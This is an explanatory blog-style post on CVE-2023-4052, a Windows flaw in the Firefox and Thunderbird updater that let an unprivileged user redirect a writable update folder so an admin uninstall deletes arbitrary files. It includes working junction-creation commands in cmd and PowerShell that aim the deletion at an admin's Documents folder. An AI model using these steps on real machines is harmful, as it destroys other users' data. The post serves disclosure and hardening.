CVE CyberSecurity Database News

CVE-2023-4052 - How a Faulty Firefox Updater Could Let Anyone Delete Your Files on Windows

Poster -

Security is all about the details, and sometimes, a tiny overlooked thing can open a big hole. CVE-2023-4052 is one such case. This vulnerability affected Firefox, Firefox ESR, and Thunderbird on Windows. It wasn’t about breaking encryption or bypassing passwords, but rather, something deceptively simple: the permissions on a folder used by the Firefox updater.

In this long-read, I’ll break down how the bug worked, show some code, explain how it could be exploited, and provide useful links for those who want to dig deeper. Let’s walk through CVE-2023-4052.

At its core, the problem was this

1. Firefox created a directory for updates, but made it so any user—even those without admin rights—could write to it.
2. When uninstalling Firefox, the installer recursively deleted all files and folders inside that directory, but with the full rights of the user uninstalling (likely an administrator).
3. If a low-privileged user set up a special type of Windows shortcut—called a junction—in that folder, pointing to some important system or user files...
4. Then when the admin uninstalled Firefox, the installer would follow the junction and delete the files wherever it pointed, instead of just deleting up its own files.

In simple terms: a normal user could trick the installer into destroying (almost) any file on the computer—just by creatively placing a link in the right spot and waiting for Firefox to be uninstalled.

Thunderbird before 115.1

Note: _Only Windows is affected._ Mac and Linux users are safe from this one.

Delete user files, causing denial of service or destroying evidence.

- Potentially exploit further—sometimes deleting files can be combined with other tricks to gain higher privileges.

Since uninstallers usually run as administrator, the impact is severe.

The problematic directory is typically

C:\ProgramData\Mozilla\updates\

or in the user's local AppData.

When Firefox updates itself, it stores temporary files here. The permissions on this directory were set too loosely.

The Junction Attack

A junction is like a special shortcut in Windows. If an attacker can create a junction where the Firefox updater expects a regular folder, operations like “delete everything in here” will follow the junction and delete whatever it points to.

If the user sets up the folder like this

C:\ProgramData\Mozilla\updates\staging     <-- writable by any user

An attacker could delete staging and replace it with a junction pointing somewhere else, like the Documents folder.

When someone runs the uninstaller as admin, it does

import shutil

shutil.rmtree(r"C:\ProgramData\Mozilla\updates\staging")

But if staging is a junction to C:\Users\Admin\Documents, then everything inside Documents gets deleted—by an admin process!

Create a junction named staging that points to a target folder (e.g., admin’s Documents).

Example using Windows command line (with Sysinternals junction.exe):

cd C:\ProgramData\Mozilla\updates
rmdir staging
junction staging "C:\Users\Admin\Documents"

Wait for the admin to uninstall Firefox.

5. During uninstallation, the Firefox uninstaller recursively deletes everything under updates\staging—which is now actually deleting Documents.

You can create a junction in PowerShell like this

$target = "C:\Users\Admin\Documents"
$link = "C:\ProgramData\Mozilla\updates\staging"
cmd /c "rmdir $link"
cmd /c "mklink /J $link $target"

Official References

- Mozilla Security Advisory 2023-29
- CVE Details: CVE-2023-4052
- Bugzilla Bug Report #1848712

Ensure the update directory isn’t writable by regular users.

2. Rework the uninstaller to check for junctions / symlinks and not follow them.
3. Harden permissions checks throughout the update/uninstall flow.

If you’re using Firefox version 116 or later (or Thunderbird 115.1+), you’re safe.

If unsure, delete everything under that directory manually before uninstalling.

The real fix? Always keep major software, especially browsers, up to date.

Conclusion

CVE-2023-4052 is a classic example that even “harmless” update directories can harbor danger if permissions aren’t tightly controlled. It also reminds us of the importance of security reviews for any installer or updater on Windows, where privilege separation isn’t always enforced.

Hopefully, this post helped you understand how something as small as a folder permission could snowball into a serious bug. For more details, check out the official advisory and Mozilla’s bug tracker linked above.

Timeline

Published on: 08/01/2023 15:15:00 UTC
Last modified on: 08/07/2023 14:15:00 UTC